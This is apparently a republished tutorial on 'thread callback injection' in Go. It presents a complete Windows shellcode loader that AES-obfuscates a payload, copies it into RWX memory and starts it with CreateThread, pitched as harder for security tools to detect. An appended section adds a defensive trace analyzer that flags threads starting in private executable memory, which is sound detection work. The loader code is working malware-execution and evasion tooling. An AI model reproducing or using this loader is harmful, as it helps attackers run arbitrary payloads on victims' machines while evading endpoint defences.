This article covers a further technique for shellcode injection in Go: thread callback injection, chosen for stealth and resilience. Unlike the basic approach of loading the shellcode and jumping into it directly with syscall.Syscall(), this method hands the shellcode to a newly created thread, which makes it harder to detect and stop.

In the previous example, we loaded the decoded shellcode into memory and executed it on the calling thread with syscall.Syscall(). That works, but it is straightforward for security tooling to identify and block. To improve on it, we implement thread callback injection: we create a new thread whose start routine is the shellcode, so the shellcode runs on its own thread rather than on the primary thread of the process.

Let's modify the exec() function accordingly. We use CreateThread(), exported by kernel32.dll, which creates a new thread in the current process and takes the address at which that thread begins executing; we pass the shellcode's address as that entry point.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"io/ioutil"
	"log"
	"syscall"
	"time"
	"unsafe"
)

// Allocation and protection constants for VirtualAlloc (Windows values).
const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40 // RWX: the single most common memory-scanner indicator
)

// 24-byte key, so aes.NewCipher selects AES-192.
// Note: with a hard-coded key and an all-zero IV (see AesCipher) this is
// obfuscation of the payload at rest, not confidentiality.
// The original listing had the octal literal 077 (= 0x3F) in the third
// position, which is a typo for 0x77; corrected here.
var AesKey = []byte{
	0x13, 0x54, 0x77, 0x1A, 0xA1, 0x3F, 0x04, 0x8B,
	0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B,
	0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B,
}

// CipherFunc is any symmetric transform that maps src to dst under key.
type CipherFunc func(key []byte, src []byte) []byte

// AesCipher applies AES-CTR with a zero IV. CTR is symmetric, so the same
// function both encodes and decodes.
func AesCipher(key []byte, src []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		log.Fatal(err)
	}
	iv := make([]byte, aes.BlockSize)
	stream := cipher.NewCTR(block, iv)
	dst := make([]byte, len(src))
	stream.XORKeyStream(dst, src)
	return dst
}

// Crypt runs the chosen CipherFunc; the parameter is named fn so it does not
// shadow the imported crypto/cipher package.
func Crypt(fn CipherFunc, key []byte, src []byte) []byte {
	return fn(key, src)
}

// Encode encrypts the payload and base64-encodes the result.
func Encode(src string) string {
	payloadBytes := []byte(src)
	encodedBytes := Crypt(AesCipher, AesKey, payloadBytes)
	return base64.StdEncoding.EncodeToString(encodedBytes)
}

// Decode reverses Encode: base64-decode, then decrypt.
func Decode(src string) []byte {
	decodedBytes, err := base64.StdEncoding.DecodeString(src)
	if err != nil {
		log.Fatal(err)
	}
	return Crypt(AesCipher, AesKey, decodedBytes)
}

var (
	kernel32      = syscall.NewLazyDLL("kernel32.dll")
	ntdll         = syscall.NewLazyDLL("ntdll.dll")
	VirtualAlloc  = kernel32.NewProc("VirtualAlloc")
	RtlMoveMemory = ntdll.NewProc("RtlMoveMemory")
	CreateThread  = kernel32.NewProc("CreateThread")
)

// exec allocates an RWX region, copies the shellcode into it and starts a new
// thread at that address. The sequence VirtualAlloc(RWX) -> memory copy ->
// CreateThread(start in private memory) is exactly what endpoint telemetry
// keys on, regardless of which thread ends up running the code.
func exec(charcode []byte) {
	if len(charcode) == 0 {
		log.Fatal("empty shellcode")
	}
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		log.Fatal("VirtualAlloc failed")
	}
	// A bare integer passed to time.Sleep is nanoseconds; the original's
	// time.Sleep(5) paused for 5 ns, which is effectively no pause at all.
	time.Sleep(5 * time.Millisecond)
	_, _, _ = RtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	time.Sleep(5 * time.Millisecond)
	// CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId)
	handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
	if handle == 0 {
		log.Fatal("CreateThread failed")
	}
	time.Sleep(5 * time.Millisecond)
	// Block until the thread (and therefore the shellcode) finishes.
	syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE)
}

func readFile(filename string) []byte {
	data, err := ioutil.ReadFile(filename)
	if err != nil {
		log.Fatal(err)
	}
	return data
}

func main() {
	// Encode and immediately Decode the raw payload; in a real build the
	// encoded string would be embedded and only Decode would run here.
	payload := string(readFile("./payload.bin"))
	encodedPayload := Encode(payload)
	shellCode := Decode(encodedPayload)
	exec(shellCode)
}
```

The modified exec() function now calls CreateThread() to create a new thread, passing the shellcode's memory address (addr) as lpStartAddress, the thread's entry point. Execution of the shellcode therefore moves off the calling thread onto a separate one, which makes it harder for mechanisms that only watch the calling thread to identify and stop it.

In short, thread callback injection adds a layer of sophistication to the shellcode injection technique: the shellcode now runs on a freshly created thread rather than on the caller's, which raises the bar for security systems trying to detect and prevent the activity. Note that the memory operations that precede the thread creation (an RWX allocation and a copy into it) are unchanged from the basic approach.
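From the defender's side, the useful observation is that the thread itself is not what gives this loader away; the sequence of API calls is. The following Go program is an added example written for this article, not code from the original page. It replays a constructed, hypothetical API-trace format (one "pid|api|k=v|..." line per call; real ETW or EDR telemetry is richer and shaped differently) and raises an alert whenever a process starts a thread whose start address lies inside a region that the same process allocated or re-protected as executable. It also handles the VirtualProtect variant, where the allocation starts RW and is flipped to executable later, which the article's loader does not use but which the same rule catches.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Windows page-protection values. Any of PAGE_EXECUTE (0x10), _READ (0x20),
// _READWRITE (0x40) or _WRITECOPY (0x80) sets a bit in executeMask.
const (
	PAGE_EXECUTE_READWRITE = 0x40
	executeMask            = 0xF0
)

// Region is a privately allocated range and its current protection.
type Region struct {
	Base, Size uint64
	Protect    uint64
}

// Alert records a thread started inside a private executable region.
type Alert struct {
	PID    int
	Start  uint64
	Reason string
}

// parseFields turns "k=v" tokens into a map; v may be hex (0x...) or decimal.
func parseFields(tokens []string) (map[string]uint64, error) {
	out := make(map[string]uint64)
	for _, tok := range tokens {
		k, v, ok := strings.Cut(tok, "=")
		if !ok {
			return nil, fmt.Errorf("bad field %q", tok)
		}
		n, err := strconv.ParseUint(v, 0, 64) // base 0 accepts the 0x prefix
		if err != nil {
			return nil, err
		}
		out[k] = n
	}
	return out, nil
}

// Analyze replays trace lines in order, tracking each process's private
// allocations, and returns one Alert per CreateThread whose start address
// falls inside a region that is currently executable.
func Analyze(lines []string) ([]Alert, error) {
	regions := make(map[int][]Region)
	var alerts []Alert
	for _, line := range lines {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		parts := strings.Split(line, "|")
		if len(parts) < 2 {
			return nil, fmt.Errorf("malformed line %q", line)
		}
		pid, err := strconv.Atoi(parts[0])
		if err != nil {
			return nil, err
		}
		f, err := parseFields(parts[2:])
		if err != nil {
			return nil, err
		}
		switch parts[1] {
		case "VirtualAlloc":
			regions[pid] = append(regions[pid], Region{f["addr"], f["size"], f["protect"]})
		case "VirtualProtect":
			// Re-protection of a tracked region updates its recorded protection.
			for i, r := range regions[pid] {
				if f["addr"] >= r.Base && f["addr"] < r.Base+r.Size {
					regions[pid][i].Protect = f["protect"]
				}
			}
		case "CreateThread":
			start := f["start"]
			for _, r := range regions[pid] {
				if start >= r.Base && start < r.Base+r.Size && r.Protect&executeMask != 0 {
					alerts = append(alerts, Alert{pid, start, fmt.Sprintf(
						"thread start 0x%x inside private executable region 0x%x-0x%x (protect 0x%x)",
						start, r.Base, r.Base+r.Size, r.Protect)})
				}
			}
		}
	}
	return alerts, nil
}

// SampleTrace is constructed telemetry, not captured data. PID 4212 mirrors
// the article's loader (RWX alloc, then a thread at its base); PID 5000 is the
// RW-then-VirtualProtect variant; the image-backed start at 0x7ff6a0011000 and
// the thread started in a never-executable region (PID 6100) are not flagged.
var SampleTrace = []string{
	"4212|VirtualAlloc|addr=0x1a20000|size=0x1000|protect=0x40",
	"4212|CreateThread|start=0x1a20000",
	"4212|CreateThread|start=0x7ff6a0011000",
	"5000|VirtualAlloc|addr=0x2b0000|size=0x2000|protect=0x04",
	"5000|VirtualProtect|addr=0x2b0000|size=0x2000|protect=0x20",
	"5000|CreateThread|start=0x2b0800",
	"6100|VirtualAlloc|addr=0x3c0000|size=0x1000|protect=0x04",
	"6100|CreateThread|start=0x3c0000",
}

func main() {
	alerts, err := Analyze(SampleTrace)
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("pid %d: %s\n", a.PID, a.Reason)
	}
}
```

Run as written it reports two alerts (PIDs 4212 and 5000). The rule is deliberately narrow: it keys on where the thread starts and on the protection of that memory, not on the thread creation itself, so ordinary threads that begin in image-backed code pass through untouched.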

Advanced Shellcode Injection with Thread Callback Injection in Go

Original source: https://www.cveoy.top/t/topic/lKli . Copyright belongs to the author; do not reproduce or scrape.